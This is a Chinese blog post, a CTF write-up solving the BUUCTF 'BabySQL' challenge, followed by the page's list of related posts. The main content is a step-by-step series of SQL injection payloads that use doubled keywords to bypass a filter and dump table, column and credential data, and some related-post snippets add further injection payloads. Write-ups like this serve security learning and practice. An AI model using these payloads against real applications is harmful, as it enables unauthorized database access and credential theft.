BUUCTF之[极客大挑战 2019]BabySQL 解决方法

最新推荐文章于 2024-04-16 16:15:28 发布
最新推荐文章于 2024-04-16 16:15:28 发布
阅读量1.8k 收藏 9
点赞数 3
分类专栏: CTF-WEB 文章标签: 安全 web sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44632787/article/details/118003825
版权

BUUCTF之[极客大挑战 2019]BabySQL 解决方法

启动我们的挑战项目
在这里插入图片描述
emmmmm这是第三个SQL注入,应该难度又提高了一些。先试试我们的万能密码:1’ or 1=1 #
在这里插入图片描述
不行,报错了。而且我也看不出报错的信息是什么
在这里插入图片描述
然后返回前面的题目看看提示信息,觉得可能这题是加了一些过滤信息
在这里插入图片描述
所以我们试试双写看看能不能绕过防御,并且把最后面的 # 号改成 %23。
所以我们的payload为:1’ oorr 1=1 %23
在这里插入图片描述
发现可以获取到信息,说明我们这个方法是正确的!
在这里插入图片描述
然后我们再进行用order by来获取有多少列,发现orderby这些关键词都被过滤掉了。另外经过测试,发现被过滤掉的关键词还有:select ,and ,or where ,from。所以我们的payload想要考虑到双写这些关键词就可以了。并且我在测试的时候发现双写关键词的时候最好把它包裹起来。比如想要双写select的时候,则要应该写成selselectect。这样子,当过滤机制过滤掉中间的select的时候,剩下的左右两边又会组合成一个新的select。
现在我们开始测试有多少列:
1’ oorrder bbyy 3 %23 回显正常
1’ oorrder bbyy 4 %23 返回报错
在这里插入图片描述
在这里插入图片描述
这说明只有3列,然后试试:-1’ ununionion selselectect 1,2,3 。看看返回的是第几列的信息
在这里插入图片描述
现在开始爆破数据库名:-1’ ununionion selselectect 1,database(),3
在这里插入图片描述
然后开始爆破表名:-1’ ununionion selselectect 1,(selselectect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()),3
在这里插入图片描述
然后再爆破列名:-1’ ununionion selselectect 1,(selselectect group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name=‘b4bsql’),3
在这里插入图片描述
然后获取b4bsql下的username和password信息:-1’ uniunionon selselectect 1,(selselectect group_concat(username," : ",passwoorrd) frfromom b4bsql),3。注意这里的password是包含着or的,所以应该把password写成passwoorrd
在这里插入图片描述
到这里就可以拿到我们的flag值了。这次的SQL注入确实是比前两次的难一些了~~~

若丶时光破灭
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF学习笔记——[极客挑战 2019]BabySQL
Obs_cure的博客
02-09 1388
一、[极客挑战 2019]BabySQL 1.题目 2.解题步骤 一看就知道是之前一个系列的题,可惜并不耽误我不会做… 在尝试的时候报错是看不懂的,这里简单记述一下心路历程。SQL注入的题目自然是1' or 1=1 # 结果很奇怪 这里在看过WP才知道是把or过滤掉了才有这样的回显。很明显我注入的东西和回显出来的东西不一样。那么是什么过滤呢,从这样的回显来看,是把or替换成了空白。师傅们的做法是双写。就是改成oorr。匹配的时候会把中间的替换成空 然后外面的再组成or。双写绕过学会了) 接下来就是常
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
[极客挑战 2019]BabySQL
weixin_41571993的博客
10-04 690
靶场练习
BUUCTF [极客挑战 2019]BabySQL
weixin_73399382的博客
04-16 323
使用payload:1' union selselectect 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23发现有报错,看了一下还能过滤的多半是where。使用payload:1' union select database(),version(),1%23报错,可能是union或者select中一个或者都是。双写by后不再报错,说明by被过滤需双写。
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2694
题目预备知识 mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当没有回显字段时,只能猜测三个字段类型分别为id,username,password 1、经过题目名提示,猜测应该是SQL注入,进入题目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
buuctf [极客挑战 2019]BabySQL
qq_52671379的博客
05-10 288
buuctf [极客挑战 2019]BabySQL
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
勇士的奇妙大冒险之几何炼金 - 洋葱数学极客挑战赛最佳创意奖.zip
最新发布
04-23
【标题解析】:“勇士的奇妙大冒险之几何炼金 - 洋葱数学极客挑战赛最佳创意奖.zip”这个标题暗示了一个与数学和几何学相关的项目或活动,可能是一个教育游戏或者教学资源。"勇士的奇妙大冒险"可能是游戏的主题,...
科研立项的极客之道.pptx
10-14
在科研立项的过程中,极客之道不仅关乎技术和创新,更是一种对科研热情的追求和责任感的体现。科研立项的初衷应该是源于个人的兴趣和对知识的渴望,而非单纯为了获取金钱、荣誉或是满足表面的成就。因此,我们需要...
21.GeekPwn 2019极客大赛之安全攻防技术总结及ShowTime1
08-03
在本文中,我们将探讨2019年GeekPwn极客大赛中的安全攻防技术,这是一个展示最新网络安全技术的平台。作者通过亲身体验,分享了大赛中的亮点和精彩瞬间,涵盖了云安全、隐私保护、机器学习、智能设备安全等多个领域...
BUUCTF [极客挑战 2019] BabySQL
Senimo
03-25 3837
BUUCTF [极客挑战 2019] BabySQL 启动靶机,打开环境: 尝试登陆: 因为前两次的题目BUUCTF 极客挑战 2019 EasySQL和均用万能密码登陆成功,再次尝试: /check.php ?username=admin' or '1'='1 &password=1 登陆失败,尝试注释掉password内容: /check.php ?username=adm...
极客挑战2019babysql
kindyyy的博客
04-08 1311
我也是参考了大佬的wp才会做的题目..... 大佬博客:[极客挑战 2019]BabySQL - 云千 - 博客园 (对我自己来说)要一步一步的从查库,查表,查列,查字段慢慢来,从这道题我们还要注意有些命令是会被注释的,可以用双写绕过。 大概就是这样。先看题目吧: ...
BUUCTF之[GXYCTF2019]BabySQli
weixin_44632787的博客
10-03 2390
题目 这题看到这个页面,而且题目上说的。给人的感觉就是个SQL注入题。。。。 启动BurpSuite抓包看看 有两个可疑点: 一是报用户错误(wrong user!),通常如果有这种错误的时候要先爆破账号,得到正确的账号后再去爆破密码。 这里返回的绿色部分明显是加密后的数据 首先提取绿色部分的信息,经过排查发现可以先base32解密,再base64 原数据: MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3C
BUU实战笔记——[GXYCTF2019]BabySQli1
qq_51175992的博客
09-16 240
这题是很简单的SQL注入,考察的是基本功和对联合查询的理解这里有两点需要特别注意:1. 不管是CTF题目还是实际的挖洞一定要先把它的流程走一遍看它是怎么玩的,再考虑怎么攻击,前期的信息收集十分重要!2.数据库的密码一般是通过MD5加密处理的,在注入的时候需要特别注意。
BUUCTF__[极客挑战 2019]BabySQL_题解
风过江南乱的博客
06-30 399
BUUCTF__[极客挑战 2019]BabySQL_题解
buuctf 极客挑战 finalsql
SopRomeo的博客
02-05 1499
说来话长,这边记录下,页面不一样了,之前的注入全部行不通,考虑到最烦最难得盲注,利用二分法查找是非常快的 这边记下playload 查库名:id=1^(ascii(substr((select(database())),1,1))>1)^1 库名为geek 查表名:id=1^(ascii(substr((select(group_concat(table_name))from(inform...
buuctf web 极客挑战2019
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值